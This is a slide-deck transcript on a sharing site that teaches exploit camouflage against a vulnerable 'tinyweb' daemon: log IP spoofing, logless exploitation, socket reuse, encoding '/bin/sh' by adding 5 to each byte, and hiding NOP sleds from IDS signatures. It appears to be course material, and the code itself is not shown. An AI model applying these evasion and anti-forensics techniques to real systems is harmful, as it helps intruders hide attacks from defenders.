1 / 24

Countermeasures (0x660~0x680)

Countermeasures (0x660~0x680). Jinsoo Kim. Contents. 1. Advanced Camouflages Spoofing the logged IP address Logless Exploitation 2. Socket Reuse 3. Payload Smuggling String Encoding How to hide a sled. 1. Advanced Camouflages. How to spoof the logged IP address in the tinyweb daemon?.

sileas
Download Presentation

Countermeasures (0x660~0x680)

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Countermeasures(0x660~0x680) Jinsoo Kim

  2. Contents • 1. Advanced Camouflages • Spoofing the logged IP address • Logless Exploitation • 2. Socket Reuse • 3. Payload Smuggling • String Encoding • How to hide a sled

  3. 1. Advanced Camouflages • How to spoof the logged IP address in the tinyweb daemon? • To spoof the IP address, we need to overwrite the client_addr_ptr with the address of our own injected sockaddr_in structure

  4. 1.1 How to spoof the logged IP address in the tinywebd daemon? • Creating and dumping a sockaddr_in structure on the standard output

  5. Shell script spoofing the logged IP

  6. Shell script spoofing the logged IP • xtool_tinywebd_spoof.sh(continued)

  7. Stack frame of handle_connection() Low address Low address request Fake request request request[500] sockaddr_in request+15 NOP sled request+100 (Landing point) 540bytes shellcode return addr (request+100) ebp ebp fake sockaddr ptr return addr sockfd logfd Client_addr_ptr logfd High address High address

  8. 1.1 How to spoof the logged IP address in the tinyweb daemon? • Let’s see what this exploit does by attaching GDB to the running tinyweb daemon. Calculating offset and return address Set the offset and Return address to xtool_tinyweb_spoof.sh

  9. Calculating offset and return address Return addr Offset Overwriting Return addr

  10. Logless Exploitation • How to exploit tinywebd without leaving any trace in the log file?

  11. 2. Socket Reuse • For IDS or IPS, the connection to port 31337 used in our reverse binding shellcode is a big red flag • Socket Reuse • No need to open a new connection by reusing the existing socket for the root shell

  12. Finding out the address of new_sockfd • Let’s find out the address of new_sockfd in main function by attacking GDB to the running tinywebd

  13. 3. Payload Smuggling • IDS or IPS systems are looking for patterns that signify an attack by inspecting packets • Packets containing the string “/bin/sh” • Can be fairly effective at catching script kiddies • However, they are easily bypassed with custom shellcode obfuscating itself

  14. String Encoding in Shellcode • To avoid being detected by pattern matching, the string is simply encoded and decoded as followed • we simply add 5 to each byte in the string “/bin/sh” and then push the string to the stack • Then the shellcode subtracts 5 from each string byte on the stack

  15. Adding 5 to each byte in “/bin/sh” for “/sh\x00” for “/bin”

  16. Low address ebx 0x736e6734 0x056d7834 High address

  17. Low address ecx ebx edx edx==0 ebx 0x6e69622f /bin 0x0068732f /sh\x00 High address

  18. How to hide a sled? • NOP sled is another signature easy to detect by network IDS systems • To avoid this signature, different single-byte instructions instead of NOP can be used • Increment and decrement instructions for registers without affecting the control flow

  19. One-byte instructions

  20. Summary

More Related